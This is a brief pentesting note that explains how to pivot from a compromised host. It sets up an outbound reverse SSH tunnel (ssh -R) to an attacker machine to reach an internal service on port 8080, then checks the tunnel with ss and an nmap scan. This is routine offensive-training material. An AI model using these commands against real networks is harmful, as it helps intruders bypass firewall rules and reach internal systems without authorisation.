In case , we have shell to 172.65.0.5 but inbound ssh service is prohibited than we can tunnel by outbound ssh on attacker machine(172.80.0.1) to any vulnerable service on target like 192.162.1.2 on port 8080

• Enable ssh on attacker machine systemctl start ssh
• On compromised machine, here R is for remote ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN ssh -R 8000:192.162.1.2:8080 [email protected] -fN
• To check if tunnelling is successful. On attacker machine ss -antp | grep "8080” sudo nmap -sS -sV 127.0.0.1 -p 8080